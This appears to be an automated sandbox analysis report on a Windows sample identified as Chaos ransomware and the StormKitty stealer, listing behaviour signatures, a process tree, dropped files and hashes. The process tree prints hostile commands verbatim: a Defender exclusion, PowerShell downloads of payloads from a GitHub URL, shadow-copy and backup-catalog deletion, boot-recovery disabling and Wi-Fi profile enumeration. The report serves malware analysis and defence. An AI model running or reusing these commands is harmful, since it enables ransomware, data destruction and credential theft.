Analysis

  • max time kernel
    93s
  • max time network
    132s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2025, 05:53

General

  • Target

    ZGZ3X_nig.exe

  • Size

    57KB

  • MD5

    16edd47bf01716b24958a0b3a3a7bcfb

  • SHA1

    8b7972f4190c2ca9d600084611e966fa0f899b98

  • SHA256

    568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8

  • SHA512

    9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1

  • SSDEEP

    768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 2 IoCs
  • Chaos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 55 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe
    "C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\610C.tmp\610D.tmp\610E.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1420
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2348
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:1872
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2576
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4884
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3792
        • C:\Users\Admin\AppData\Local\Temp\build.exe
          "C:\Users\Admin\AppData\Local\Temp\build.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2024
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            "C:\Users\Admin\AppData\Roaming\svchost.exe"
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2828
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4292
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                6⤵
                • Interacts with shadow copies
                PID:624
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic shadowcopy delete
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3124
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1680
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:3528
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled no
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:1308
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3900
              • C:\Windows\system32\wbadmin.exe
                wbadmin delete catalog -quiet
                6⤵
                • Deletes backup catalog
                PID:3448
            • C:\Windows\system32\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
              5⤵
              • Opens file in notepad (likely ransom note)
              PID:1728
        • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
          "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:3412
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:4400
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3716
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show profile
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:4944
            • C:\Windows\SysWOW64\findstr.exe
              findstr All
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4260
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 2472
            4⤵
            • Program crash
            PID:232
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4004
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2844
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show networks mode=bssid
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4700
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3412 -ip 3412
      1⤵
        PID:3804
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1476
      • C:\Windows\system32\wbengine.exe
        "C:\Windows\system32\wbengine.exe"
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:796
      • C:\Windows\System32\vdsldr.exe
        C:\Windows\System32\vdsldr.exe -Embedding
        1⤵
          PID:116
        • C:\Windows\System32\vds.exe
          C:\Windows\System32\vds.exe
          1⤵
          • Checks SCSI registry key(s)
          PID:4904

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

          Filesize

          1B

          MD5

          d1457b72c3fb323a2671125aef3eab5d

          SHA1

          5bab61eb53176449e25c2c82f172b82cb13ffb9d

          SHA256

          8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1

          SHA512

          ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

          Filesize

          226B

          MD5

          28d7fcc2b910da5e67ebb99451a5f598

          SHA1

          a5bf77a53eda1208f4f37d09d82da0b9915a6747

          SHA256

          2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

          SHA512

          2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          ada23d35e4a3f1bc35ac8d393cd02675

          SHA1

          88dd6ddecec82aeafba2b6368078c7c70b88fcac

          SHA256

          98d17949831dda7243aa8b24a66443eee75d0805996826290fbe1a75bfc79e72

          SHA512

          0acae33f83787122b779b8b1b41580f4595eb44c74ef0035949e3d90103fd22e15ed4af4238985bd58f8a0378dc8bce4d77549ca4bb661c2c515018be99a79e6

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          6167e0b3b1bfe7811333fb0ff4260abb

          SHA1

          3ff0163e7819457a077316365ddbf19d8b4ea8f7

          SHA256

          7550ba7b917b7671dcb9783f7acb31854880f1fa845d7496ad27e013d70f4364

          SHA512

          d0bc4f05c0eea70d441eef08f77495a1aea546c679c99e75eec34d1d5dc6c2ae2ddc7f1fadae515a74e8d8e90d493ab68c5ea24f33878491250ebd994cd061a5

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          43b0b5c58203d453fd8d31d936d5e6df

          SHA1

          9e4b7869c15801e1a86c1319919523fe4bd6c841

          SHA256

          df3e0f7f7ef55cb398b3c25cdc9d0aa5a2868b5ab528d121b4e0146c1fb4b6fb

          SHA512

          816ebd495eea2f729d79f49b14e7698d32bc563d6569098acc45f0d12e8f8cf10abd2cfdd28a98e7a2798f05dac10d58d04ab89c269598b5a8181feb8fe8ee83

        • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

          Filesize

          81B

          MD5

          ea511fc534efd031f852fcf490b76104

          SHA1

          573e5fa397bc953df5422abbeb1a52bf94f7cf00

          SHA256

          e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

          SHA512

          f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

        • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

          Filesize

          1KB

          MD5

          062e358575f650b17d5537a547dba62d

          SHA1

          b396fb8e5fad0bd3c0e25bcdc511c02c8048f125

          SHA256

          62457dcf70b8b1c72574ed4acfa8041830554bb005f72564efa8b4d7e5815b02

          SHA512

          87e74e1d92767823acdb228241ec4081a168de0d9f48472b6a38eee08891e5fb1d629544c9720290bb8cc64b637aa5b3108ee738c291c4f6c6905686358f3e0e

        • C:\Users\Admin\AppData\Local\Temp\610C.tmp\610D.tmp\610E.bat

          Filesize

          2KB

          MD5

          1c935ef28fdfd394b770d945d7f04d76

          SHA1

          29e251c3c40ce4ad1b2984bf26b444aa045d9b21

          SHA256

          aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

          SHA512

          a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_55yv0lv5.2wm.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\build.exe

          Filesize

          137KB

          MD5

          7605fb5c749eeea0b1b27fdaad78051c

          SHA1

          28388bf016af085bbcbacf8c516853942f6ec8d3

          SHA256

          466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93

          SHA512

          1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

        • C:\Users\Admin\AppData\Local\Temp\kernelv.exe

          Filesize

          211KB

          MD5

          b6054dbe4ed853c2e35291f045a632ba

          SHA1

          1355fbe1ea1f6bb566921f04512f78590c4b0e41

          SHA256

          b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4

          SHA512

          648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0

        • C:\Users\Admin\readme.txt

          Filesize

          780B

          MD5

          60d646f40556d78166ad8111d850fc51

          SHA1

          babaaf0762000dbf4b3f7a93beb35b6d9279d94d

          SHA256

          a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab

          SHA512

          3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

        • memory/1868-0-0x0000000140000000-0x0000000140028000-memory.dmp

          Filesize

          160KB

        • memory/1868-42-0x0000000140000000-0x0000000140028000-memory.dmp

          Filesize

          160KB

        • memory/1868-65-0x0000000140000000-0x0000000140028000-memory.dmp

          Filesize

          160KB

        • memory/2024-49-0x00000000008E0000-0x0000000000908000-memory.dmp

          Filesize

          160KB

        • memory/2576-18-0x00007FFBBC540000-0x00007FFBBD001000-memory.dmp

          Filesize

          10.8MB

        • memory/2576-15-0x00007FFBBC540000-0x00007FFBBD001000-memory.dmp

          Filesize

          10.8MB

        • memory/2576-14-0x00007FFBBC540000-0x00007FFBBD001000-memory.dmp

          Filesize

          10.8MB

        • memory/2576-9-0x0000024704A60000-0x0000024704A82000-memory.dmp

          Filesize

          136KB

        • memory/2576-3-0x00007FFBBC543000-0x00007FFBBC545000-memory.dmp

          Filesize

          8KB

        • memory/3412-64-0x00000000048E0000-0x00000000048F2000-memory.dmp

          Filesize

          72KB

        • memory/3412-66-0x0000000004AD0000-0x0000000004C92000-memory.dmp

          Filesize

          1.8MB

        • memory/3412-67-0x0000000005A50000-0x0000000005F7C000-memory.dmp

          Filesize

          5.2MB

        • memory/3412-68-0x0000000006400000-0x0000000006466000-memory.dmp

          Filesize

          408KB

        • memory/3412-69-0x0000000006610000-0x00000000066A2000-memory.dmp

          Filesize

          584KB

        • memory/3412-120-0x00000000070C0000-0x0000000007664000-memory.dmp

          Filesize

          5.6MB

        • memory/3412-62-0x00000000000D0000-0x000000000010C000-memory.dmp

          Filesize

          240KB